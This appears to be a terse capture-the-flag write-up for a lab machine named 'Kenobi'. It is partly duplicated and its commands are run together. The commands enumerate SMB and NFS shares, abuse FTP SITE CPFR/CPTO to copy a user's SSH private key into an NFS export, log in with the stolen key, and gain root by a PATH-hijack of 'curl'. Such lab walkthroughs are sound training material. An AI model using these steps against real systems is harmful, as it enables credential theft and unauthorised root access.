Kenobi
January 11, 2024
smbclient -L 10.10.103.177
smbclient \\\\10.10.103.177\\anonymous











Last updated
January 11, 2024
smbclient -L 10.10.103.177
smbclient \\\\10.10.103.177\\anonymous











Last updated
sudo nmap -sSUC -p 111 10.10.103.177showmount -e 10.10.103.177nc 10.10.103.177 21nc 10.10.103.177 21
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsasudo mkdir attacker
sudo mount -o rw 10.10.82.198:/var/tmp /tmp/attackerssh -i id_rsa kenobi@10.10.82.198cd /tmp
echo /bin/bash > curl
chmod 777 curl
export PATH=/tmp:$PATH
menu